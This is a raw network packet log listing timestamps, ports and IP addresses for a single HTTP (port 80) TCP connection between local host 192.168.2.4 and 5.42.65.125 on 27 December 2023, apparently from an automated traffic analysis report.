Dec 27, 2023 17:57:26.131239891 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.131258011 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.131715059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.131764889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.131778955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.131792068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.131804943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.131818056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.131824970 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.131833076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.131851912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.131861925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.131874084 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.131876945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.131892920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.131936073 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.132114887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.132153988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.132159948 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.132169962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.132183075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.132196903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.132210970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.132225037 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.132225990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.132244110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.132255077 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.132271051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.132273912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.132287025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.132328033 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.132463932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.132478952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.132492065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.132504940 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.132504940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.132519960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.132534981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.132534027 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.132550001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.132560015 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.132565022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.132579088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.132591963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.132596016 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.132611036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.132621050 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.132651091 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.133260965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.133301973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.133354902 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.133388042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.133403063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.133426905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.133440971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.133447886 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.133455992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.133471012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.133480072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.133491993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.133512020 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.133521080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.133534908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.133548021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.133573055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.133594036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.133596897 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.133610010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.133625984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.133639097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.133646965 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.133655071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.133668900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.133673906 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.133683920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.133698940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.133709908 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.133713961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.133738995 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.134012938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.134027958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.134052992 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.134160042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.134174109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.134187937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.134198904 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.134205103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.134219885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.134227991 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.134233952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.134274006 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.134448051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.134497881 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.134499073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.134515047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.134529114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.134541988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.134557962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.134567022 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.134572029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.134593010 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.134609938 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.134619951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.134639025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.134674072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.134696960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.134711981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.134726048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.134741068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.134764910 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.134789944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.134790897 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.134805918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.134819031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.134841919 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.134923935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.134938955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.134952068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.134958982 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.134968042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.134980917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.135004044 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.135031939 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.135382891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.135396957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.135411024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.135440111 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.135462999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.135504961 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.135551929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.135565996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.135579109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.135591984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.135600090 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.135606050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.135620117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.135633945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.135644913 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.135648966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.135663033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.135672092 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.135679960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.135684013 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.135724068 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.135772943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.135787964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.135799885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.135813951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.135818958 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.135828018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.135843992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.135848045 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.135859013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.135881901 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.136462927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.136476994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.136490107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.136502981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.136517048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.136516094 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.136532068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.136540890 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.136545897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.136559010 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.136562109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.136586905 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.136709929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.136754036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.136768103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.136790991 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.136810064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.136822939 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.136826992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.136852980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.136862993 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.136873007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.136885881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.136919022 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.136960030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.136975050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.136997938 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.137018919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.137037039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.137058020 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.137104988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.137119055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.137131929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.137145042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.137154102 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.137160063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.137175083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.137182951 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.137188911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.137202024 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.137203932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.137218952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.137232065 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.137257099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.137753963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.137768030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.137779951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.137793064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.137806892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.137818098 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.137836933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.137849092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.137861967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.137873888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.137887001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.137893915 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.137902021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.137916088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.137922049 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.137929916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.137943029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.137943029 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.137958050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.137979984 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.137985945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.138000011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.138006926 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.138015032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.138031006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.138036966 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.138046026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.138062954 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.138062954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.138081074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.138106108 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.138686895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.138700962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.138714075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.138741970 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.138744116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.138763905 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.138850927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.138864994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.138876915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.138890028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.138899088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.138930082 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.139132023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.139194012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.139230967 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.139296055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.139328957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.139353037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.139369965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.139384031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.139396906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.139415026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.139420033 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.139437914 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.139441967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.139455080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.139473915 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.139497995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.139512062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.139524937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.139537096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.139547110 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.139553070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.139569998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.139573097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.139585018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.139599085 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.139600992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.139621019 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.139627934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.139642954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.139657021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.139669895 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.139689922 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.139981985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.140058994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.140073061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.140085936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.140105963 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.140135050 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.140187025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.140201092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.140213966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.140227079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.140234947 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.140239000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.140253067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.140259981 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.140268087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.140294075 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.140311956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.140328884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.140341997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.140356064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.140367031 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.140371084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.140384912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.140393972 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.140398026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.140418053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.140448093 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.140525103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.140537977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.140551090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.140579939 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.140949011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.140963078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.140974045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.140985966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.140989065 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.140999079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.141011000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.141024113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.141031027 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.141092062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.141103983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.141124010 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.141422987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.141436100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.141458988 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.141484022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.141498089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.141509056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.141522884 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.141541958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.141546011 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.141557932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.141571045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.141582012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.141592979 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.141596079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.141617060 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.141629934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.141643047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.141664028 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.141731977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.141746998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.141758919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.141769886 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.141771078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.141784906 CET	80	49738	5.42.65.125	192.168.2.4
